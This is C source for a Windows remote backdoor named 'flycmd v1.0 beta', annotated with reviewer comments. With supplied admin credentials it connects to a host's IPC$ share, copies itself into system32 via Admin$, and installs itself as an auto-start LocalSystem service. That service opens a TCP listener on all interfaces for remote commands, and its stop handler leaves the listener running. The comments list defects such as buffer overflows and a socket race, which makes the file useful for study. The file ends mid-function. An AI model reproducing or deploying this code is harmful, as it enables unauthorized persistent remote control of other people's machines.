#include "cmdbackdoor.h"
/*
 * Entry point. The mode is chosen purely by argument count:
 *  - argc==5: "<-install|-remove> <host> <user> <password>". Opens an
 *    authenticated session to \\host\ipc$ with the supplied credentials
 *    (ConnectRemote), installs or removes the service on that host, then
 *    drops the session. The user name and password travel in clear text
 *    on the command line (argv[3], argv[4]) and are therefore visible in
 *    process listings / command-line auditing.
 *  - argc==2: "-install" / "-remove" act on the local machine; any other
 *    single argument prints the banner (Start) and usage (Usage).
 *  - anything else: assumes launch by the Service Control Manager and
 *    hands control to StartServiceCtrlDispatcher with ServiceMain.
 * Review notes:
 *  - stricmp is case-insensitive, so "-INSTALL" etc. are accepted as well.
 *  - in the 5-argument path an unrecognised argv[1] still performs the IPC$
 *    connect and disconnect round trip and exits 0.
 *  - the return value of StartServiceCtrlDispatcher is not checked, so a
 *    direct launch with 0 or 3+ arguments fails silently.
 */
int main(int argc, char* argv[])
{
SERVICE_TABLE_ENTRY ServiceTable[] = // service entry table handed to the SCM dispatcher
{{szServiceName, (LPSERVICE_MAIN_FUNCTION)ServiceMain},{NULL, NULL}};
if(argc==5)
{
if(ConnectRemote(1,argv[2],argv[3],argv[4])==0) return -1;
if(!stricmp(argv[1],"-install")) InstallCmdService(argv[2]);
else if(!stricmp(argv[1],"-remove")) RemoveCmdService(argv[2]);
if(ConnectRemote(0,argv[2],argv[3],argv[4])==0) return -1;
return 0;
}
else if(argc==2)
{
if(!stricmp(argv[1],"-install")) InstallCmdService(NULL);
else if(!stricmp(argv[1],"-remove")) RemoveCmdService(NULL);
else
{
Start();
Usage(argv[0]);
}
return 0;
}
StartServiceCtrlDispatcher(ServiceTable);
return 0;
}
/*
 * Service entry called by the SCM dispatcher (see main). Registers
 * ServiceCtrlHandler for control requests, seeds the global ssStatus and
 * calls ServiceStart. dwArgc/lpszArgv are ignored.
 * Review notes:
 *  - dwControlsAccepted set here (STOP | PAUSE_CONTINUE) is overwritten by
 *    ReportStatusToSCMgr before any SetServiceStatus call in this file, so
 *    PAUSE/CONTINUE is never actually advertised to the SCM.
 *  - a failed RegisterServiceCtrlHandler is silently ignored (the logging
 *    call is commented out), and the function just returns.
 */
void ServiceMain(DWORD dwArgc, LPTSTR *lpszArgv)
{ // register the service control handler with the SCM
sshStatusHandle = RegisterServiceCtrlHandler(szServiceName,
(LPHANDLER_FUNCTION)ServiceCtrlHandler);
if (sshStatusHandle)
{ // set the service type
ssStatus.dwServiceType = SERVICE_WIN32_OWN_PROCESS;
ssStatus.dwServiceSpecificExitCode = 0; // service-specific error code
ssStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP
| SERVICE_ACCEPT_PAUSE_CONTINUE;
ServiceStart(); // run the service
} /* else AddMessageToLog("RegisterServiceCtrlHandler failed! \n"); */
}
/*
 * SCM control handler registered in ServiceMain.
 * Only SERVICE_CONTROL_STOP is handled, and only cosmetically: the service
 * reports STOP_PENDING and then STOPPED straight away, but nothing in this
 * file stops the listener — ServiceStop() is commented out, hStopEvent
 * (created in ServiceStart) is never signalled, and no socket is closed or
 * thread terminated. The process presumably keeps accepting connections
 * after the SCM already shows the service as stopped — confirm against
 * ThreadGetCmd/ProtectSelf in the header.
 * SERVICE_CONTROL_INTERROGATE falls into the default branch and sends no
 * status update at all.
 */
void ServiceCtrlHandler(DWORD dwCtrlCode)
{
switch (dwCtrlCode)
{
case SERVICE_CONTROL_STOP:
// Service is about to stop (the state must be set to SERVICE_STOP_PENDING before stopping)
ReportStatusToSCMgr(SERVICE_STOP_PENDING, NO_ERROR, 5000);
// Stop-service code would go here; it is disabled, so the listener keeps running
// ServiceStop();
// Service has stopped (must report SERVICE_STOPPED afterwards, otherwise it cannot be started again)
ReportStatusToSCMgr(SERVICE_STOPPED, NO_ERROR, 0);
break;
/* case SERVICE_CONTROL_INTERROGATE:
break; */
default:
break;
}
}
/*
 * Brings the service up: reports START_PENDING, creates a manual-reset
 * event named "stop", reports RUNNING and spawns ServiceThread (the TCP
 * listener).
 * Review notes:
 *  - SERVICE_RUNNING is reported before the listener thread even exists,
 *    let alone before the socket is bound.
 *  - hStopEvent is named ("stop") and therefore visible to other processes
 *    in the same namespace; nothing in this file ever waits on or sets it.
 *  - the thread handle returned by CreateThread is discarded (handle leak),
 *    and a NULL CreateThread result is not detected.
 *  - dwCreationFlags is passed as NULL (a pointer constant) where a DWORD
 *    is expected; it evaluates to 0 (run immediately) but is a type slip.
 *  - ServiceThread is declared void yet cast to LPTHREAD_START_ROUTINE,
 *    which is expected to return DWORD.
 */
void ServiceStart()
{
DWORD dwThreadId; // about to start: report SERVICE_START_PENDING so the SCM knows we are coming up
ReportStatusToSCMgr(SERVICE_START_PENDING, NO_ERROR, 1000);
hStopEvent = CreateEvent(NULL, TRUE, FALSE, "stop");
if (hStopEvent == NULL) return;
ReportStatusToSCMgr(SERVICE_RUNNING, NO_ERROR, 0);
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)&ServiceThread, NULL, NULL, &dwThreadId);
}
/*
 * Pushes a state change to the SCM via the global ssStatus/sshStatusHandle.
 *  dwCurrentState  SERVICE_* state to report.
 *  dwExitCode      Win32 exit code placed in dwWin32ExitCode.
 *  dwWaitHint      milliseconds the SCM should wait before the next checkpoint.
 * Returns true unconditionally — the result of SetServiceStatus is ignored,
 * so callers cannot tell whether the SCM accepted the update.
 * Review notes:
 *  - `static dwCheckPoint = 1;` relies on implicit int (pre-standard C);
 *    the original compiler evidently accepted it, modern ones will not.
 *  - dwControlsAccepted is rewritten on every call: 0 while START_PENDING,
 *    SERVICE_ACCEPT_STOP otherwise. This is why the PAUSE_CONTINUE flag set
 *    in ServiceMain never reaches the SCM.
 */
bool ReportStatusToSCMgr(DWORD dwCurrentState, DWORD dwExitCode, DWORD dwWaitHint)
{
static dwCheckPoint = 1;
if (dwCurrentState == SERVICE_START_PENDING) ssStatus.dwControlsAccepted = 0;// start pending: accept no controls yet
else ssStatus.dwControlsAccepted = SERVICE_ACCEPT_STOP; // otherwise accept STOP only
ssStatus.dwCurrentState = dwCurrentState; // record the new state
ssStatus.dwWin32ExitCode = dwExitCode;
ssStatus.dwWaitHint = dwWaitHint;
if ((ssStatus.dwCurrentState == SERVICE_RUNNING) ||
(ssStatus.dwCurrentState == SERVICE_STOPPED)) ssStatus.dwCheckPoint = 0;
else
ssStatus.dwCheckPoint = dwCheckPoint++;// pending states carry an increasing checkpoint
SetServiceStatus(sshStatusHandle, &ssStatus);
return true;
}
/*
 * Listener thread started by ServiceStart. Initialises Winsock, binds a TCP
 * socket on every interface (INADDR_ANY) at port atoi(PORT) (PORT is defined
 * in the header, not visible here), listens with backlog 5, starts the
 * ProtectSelf thread, then accepts clients forever and hands each one to
 * ThreadGetCmd. lpParameter is ignored. The listening port and the service
 * name are the observable indicators of this component.
 * Review notes (defects visible in this block):
 *  - socket/bind/listen/accept return values are never checked; if any fails
 *    the loop keeps calling accept() and spawning workers on an invalid socket.
 *  - &ClientSocket, a stack variable of this thread, is passed to every
 *    ThreadGetCmd. The next accept() overwrites it, so a worker that has not
 *    yet copied the value reads the wrong client socket. Sleep(1000) narrows
 *    that window but does not close it.
 *  - the __finally block is empty, and WSACleanup is unreachable because the
 *    accept loop never exits.
 *  - thread handles returned by both CreateThread calls are discarded.
 */
void ServiceThread(LPVOID lpParameter)
{
__try
{
WSADATA WSAData;
struct sockaddr_in RemoteAddr;
SOCKET ClientSocket,ServerSocket;
WSAStartup(MAKEWORD(2,2),&WSAData);
ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
RemoteAddr.sin_family = AF_INET;
RemoteAddr.sin_port = htons(atoi(PORT)); // PORT must be a string literal for atoi()
RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY; // bind on all interfaces
bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
listen(ServerSocket, 5);
CreateThread(NULL,0,ProtectSelf,(LPVOID)NULL,0,NULL); // defined in the header; purpose not visible here
while(1)
{
ClientSocket = accept(ServerSocket, NULL, NULL);
// pointer to a variable the next iteration overwrites — see race note above
CreateThread(NULL,0,ThreadGetCmd,(LPVOID)&ClientSocket,0,NULL);
Sleep(1000);
}
}
__finally {}
WSACleanup(); // never reached: the accept loop above does not terminate
return ;
}
/*
 * Establishes (bConnect!=0) or tears down (bConnect==0) an authenticated
 * SMB session to \\lpHost\ipc$ with lpUserName/lpPassword, so that the Admin$
 * file copy and remote SCM calls in InstallCmdService/RemoveCmdService run
 * under those credentials.
 * Returns 1 on success and FALSE (0) on failure; progress is printed to stdout.
 * Review notes:
 *  - lpIPC is 256 bytes and filled by sprintf from lpHost, which main takes
 *    straight from argv[2]. A host string longer than about 248 bytes
 *    overflows the stack buffer.
 *  - NetResource is only partially initialised; the fields not set here are
 *    left indeterminate (presumably ignored by WNetAddConnection2 for this
 *    call shape — verify).
 *  - if the share is already mapped, the existing mapping is force-cancelled
 *    (CONNECT_UPDATE_PROFILE, fForce=TRUE) and the connect retried; the
 *    retry loop has no upper bound.
 *  - CONNECT_INTERACTIVE allows the OS to prompt the user for credentials
 *    when run from an interactive session.
 */
int ConnectRemote(int bConnect,char *lpHost,char *lpUserName,char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode;
NETRESOURCE NetResource;
sprintf(lpIPC,"\\\\%s\\ipc$",lpHost); // unbounded: see overflow note above
NetResource.lpLocalName = NULL; // no drive letter, just a session
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
if(bConnect)
{
printf("Now Connecting ...... ");
while(1)
{
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if((dwErrorCode==ERROR_ALREADY_ASSIGNED) || (dwErrorCode==ERROR_DEVICE_ALREADY_REMEMBERED))
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE); // drop the stale mapping and retry
else if(dwErrorCode==NO_ERROR)
{
printf("Success !\n");
break;
}
else
{
printf("Failure !\n");
return FALSE;
}
Sleep(10);
}
}
else
{
printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode==NO_ERROR) printf("Success !\n");
else
{
printf("Failure !\n");
return FALSE;
}
}
return 1;
}
/*
 * Installs this executable as an auto-start Windows service, either locally
 * (lpHost==NULL) or on a remote host (lpHost!=NULL) via the Admin$ share and
 * the remote SCM — the caller (main) has already opened the IPC$ session.
 * Steps:
 *  1. target path: %SystemDir%\EXENAME, or \\host\Admin$\system32\EXENAME;
 *  2. if no file exists there, CopyFile our own image (GetModuleFileName) to it;
 *  3. CreateService(szServiceName, SERVICE_AUTO_START, SERVICE_ERROR_IGNORE,
 *     NULL account => LocalSystem per the CreateService contract), or
 *     OpenService if it already exists;
 *  4. StartService and poll until the state leaves SERVICE_START_PENDING.
 * Artefacts left on the target: the copied binary in system32, a LocalSystem
 * auto-start service named szServiceName, and (remote case) an Admin$/IPC$
 * logon from the operator's host.
 * Review notes:
 *  - lpImagePath (MAX_PATH) is filled by sprintf from lpHost (argv) with no
 *    bound; a long host string overflows it.
 *  - lpHostName is malloc'd and never freed.
 *  - an already-existing file or service is accepted as-is; its content /
 *    image path is not compared with what this run would have installed.
 *  - a StartService failure other than ERROR_SERVICE_ALREADY_RUNNING is not
 *    reported as such; the code falls through to the status poll.
 *  - error 5 is ERROR_ACCESS_DENIED.
 */
void InstallCmdService(char *lpHost)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpCurrentPath[MAX_PATH];
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
HANDLE hSearch;
DWORD dwErrorCode;
SERVICE_STATUS InstallServiceStatus;
if(lpHost==NULL)
{
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\");strcat(lpImagePath,EXENAME);
lpHostName=NULL; // local SCM
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\%s",lpHost,EXENAME); // unbounded: see overflow note above
lpHostName=(char *)malloc(256); // never freed
sprintf(lpHostName,"\\\\%s",lpHost);
}
printf("Transmitting File ... ");
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE)
{
GetModuleFileName(NULL,lpCurrentPath,MAX_PATH); // copy our own image
if(CopyFile(lpCurrentPath,lpImagePath,FALSE)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==5) printf("Failure ... Access is Denied !\n"); // 5 == ERROR_ACCESS_DENIED
else printf("Failure !\n");
return ;
}
else printf("Success !\n");
}
else
{
printf("Already Exists !\n"); // existing file is trusted without comparison
FindClose(hSearch);
}
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
{
printf("Open Service Control Manager Database Failure !\n");
return ;
}
printf("Creating Service .... ");
schService=CreateService(schSCManager,
szServiceName,// service name
szServiceName,// display name shown in the Services console
SERVICE_ALL_ACCESS,// desired access
SERVICE_WIN32_OWN_PROCESS,// service type
SERVICE_AUTO_START,// start type: launched at boot
SERVICE_ERROR_IGNORE,// error control: start failures are not flagged
lpImagePath,// image path
NULL,// load order group
NULL,// tag id
NULL,// dependencies
NULL,// account (NULL => LocalSystem)
NULL); // password
if(schService==NULL)
{
dwErrorCode=GetLastError();
if(dwErrorCode!=ERROR_SERVICE_EXISTS)
{
printf("Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
else
{
printf("Already Exists !\n");
schService=OpenService(schSCManager,szServiceName,SERVICE_START); // reuse whatever is registered
if(schService==NULL)
{
printf("Opening Service .... Failure !\n");
CloseServiceHandle(schSCManager);
return ;
}
}
}
else printf("Success !\n");
printf("Starting Service .... ");
if(StartService(schService,0,NULL)==0)
{
dwErrorCode=GetLastError();
if(dwErrorCode==ERROR_SERVICE_ALREADY_RUNNING)
{
printf("already Running !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
// any other StartService error falls through to the status poll below
}
else printf("Pending ... ");
while(QueryServiceStatus(schService,&InstallServiceStatus)!=0)
{
if(InstallServiceStatus.dwCurrentState==SERVICE_START_PENDING) Sleep(100);
else break;
}
if(InstallServiceStatus.dwCurrentState!=SERVICE_RUNNING)printf("Failure !\n");
else printf("Success !\n");
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService);
return ;
}
/*
 * Reverse of InstallCmdService: stops and deletes the service szServiceName,
 * then deletes the binary, locally (lpHost==NULL) or on a remote host via the
 * remote SCM and the Admin$ share (lpHost!=NULL; IPC$ session opened by main).
 * Progress is printed to stdout; there is no return value.
 * Review notes:
 *  - lpImagePath (MAX_PATH) is filled by sprintf from lpHost (argv) with no
 *    bound; lpHostName is malloc'd and never freed.
 *  - when OpenService fails, schSCManager is closed at the inner
 *    CloseServiceHandle and then closed a second time after the else block,
 *    and CloseServiceHandle is called on the NULL schService.
 *  - the SERVICE_STOP_PENDING poll has no upper bound and ignores a failing
 *    QueryServiceStatus.
 *  - Sleep(1500) before DeleteFile presumably gives the stopped process time
 *    to release its image — verify; a still-running process keeps the file.
 *  - error 5 is ERROR_ACCESS_DENIED, 1060 is ERROR_SERVICE_DOES_NOT_EXIST.
 *  - "Failuer" is a typo in a runtime string (left untouched here).
 */
void RemoveCmdService(char *lpHost)
{
SC_HANDLE schSCManager;
SC_HANDLE schService;
char lpImagePath[MAX_PATH];
char *lpHostName;
WIN32_FIND_DATA FileData;
SERVICE_STATUS RemoveServiceStatus;
HANDLE hSearch;
DWORD dwErrorCode;
if(lpHost==NULL)
{
GetSystemDirectory(lpImagePath,MAX_PATH);
strcat(lpImagePath,"\\");strcat(lpImagePath,EXENAME);
lpHostName=NULL; // local SCM
}
else
{
sprintf(lpImagePath,"\\\\%s\\Admin$\\system32\\%s",lpHost,EXENAME); // unbounded: see overflow note above
lpHostName=(char *)malloc(MAX_PATH); // never freed
sprintf(lpHostName,"\\\\%s",lpHost);
}
schSCManager=OpenSCManager(lpHostName,NULL,SC_MANAGER_ALL_ACCESS);
if(schSCManager==NULL)
{
printf("Opening SCM ......... ");
dwErrorCode=GetLastError();
if(dwErrorCode!=5) printf("Failure !\n"); // 5 == ERROR_ACCESS_DENIED
else printf("Failuer ... Access is Denied !\n");
return ;
}
schService=OpenService(schSCManager,szServiceName,SERVICE_ALL_ACCESS);
if(schService==NULL)
{
printf("Opening Service ..... ");
dwErrorCode=GetLastError();
if(dwErrorCode==1060) printf("no Exists !\n"); // 1060 == ERROR_SERVICE_DOES_NOT_EXIST
else printf("Failure !\n");
CloseServiceHandle(schSCManager); // closed again below — double close on this path
}
else
{
printf("Stopping Service .... ");
if(QueryServiceStatus(schService,&RemoveServiceStatus)!=0)
{
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) printf("already Stopped !\n");
else
{
printf("Pending ... ");
if(ControlService(schService,SERVICE_CONTROL_STOP,&RemoveServiceStatus)!=0)
{
while(RemoveServiceStatus.dwCurrentState==SERVICE_STOP_PENDING) // unbounded wait
{
Sleep(10);
QueryServiceStatus(schService,&RemoveServiceStatus);
}
if(RemoveServiceStatus.dwCurrentState==SERVICE_STOPPED) printf("Success !\n");
else printf("Failure !\n");
}
else printf("Failure !\n");
} }
else printf("Query Failure !\n");
printf("Removing Service .... ");
if(DeleteService(schService)==0) printf("Failure !\n");
else printf("Success !\n");
}
CloseServiceHandle(schSCManager);
CloseServiceHandle(schService); // NULL when OpenService failed above
printf("Removing File ....... ");
Sleep(1500); // give the stopped service process time to release the image (assumption)
hSearch=FindFirstFile(lpImagePath,&FileData);
if(hSearch==INVALID_HANDLE_VALUE) printf("no Exists !\n");
else
{ if(DeleteFile(lpImagePath)==0) printf("Failure !\n");
else printf("Success !\n");
FindClose(hSearch);
}
return ;
}
void Start()
{
printf("\r\t*******************************************\n\r\t|-----[ flycmd v1.0 beta , by qfsl ]------|\n\r\t|-----[ E-mail: qfsl@163.net ]------|\n\r\t|-----[ HomePage: qfsl.51.net ]------|\n\r\t|-----[ Date: 02-04-2005 ]------|\n\r\t*******************************************\n\r");